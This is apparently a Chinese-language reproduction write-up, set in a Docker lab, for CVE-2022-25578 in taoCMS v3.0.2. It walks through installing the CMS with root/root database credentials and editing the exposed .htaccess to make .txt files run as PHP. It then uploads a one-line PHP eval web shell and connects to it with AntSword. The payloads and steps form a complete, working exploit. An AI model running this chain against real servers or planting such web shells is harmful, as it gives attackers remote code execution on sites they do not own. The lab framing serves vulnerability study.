yuandian2025-02-21文章来源:SecHub网络安全社区
漏洞描述
taoCMS是基于php+sqlite/mysql的国内最小(100Kb左右)的功能完善的CMS管理系统.体积小(仅180Kb)速度快,包含文件管理、数据采集、Memcache整合、用户管理等强大功能。taocms v3.0.2 允许攻击者通过任意编辑.htaccess 文件来执行文件上传。输入http://ip:port/install.php进入安装页面,数据库配置为|127.0.0.1:3306|root|root|taocms
漏洞复现:
1、配置环境,通过docker拉取cms
docker pull vulfocus/taocms_cve_2022_25578:latest
docker run -itd -p 14726:80 vulfocus/taocms_cve_2022_25578:latest
2、访问ip:port/install.php
3、数据库类型选择Mysqli,数据库配置为|127.0.0.1:3306|root|root|taocms
4、进入后台
5、选择文件管理,可以看到.htaccess文件暴露且可以被修改
6、点击右上角的上传按钮,发现有白名单限制,这时候修改.htaccess文件,使.txt后缀的文件能够被php解析,添加POC,这里先给POC
POC如下:
**.htaccess:**AddHandler application/x-httpd-php .txt
一句话木马:<?php @eval($_POST['cmd']);?>
7、重新上传.txt文件,可以发现文件上传路径到了pictures目录下
8、使用蚁剑连接可以发现连接成功(http://ip:port/pictures/xxx.txt)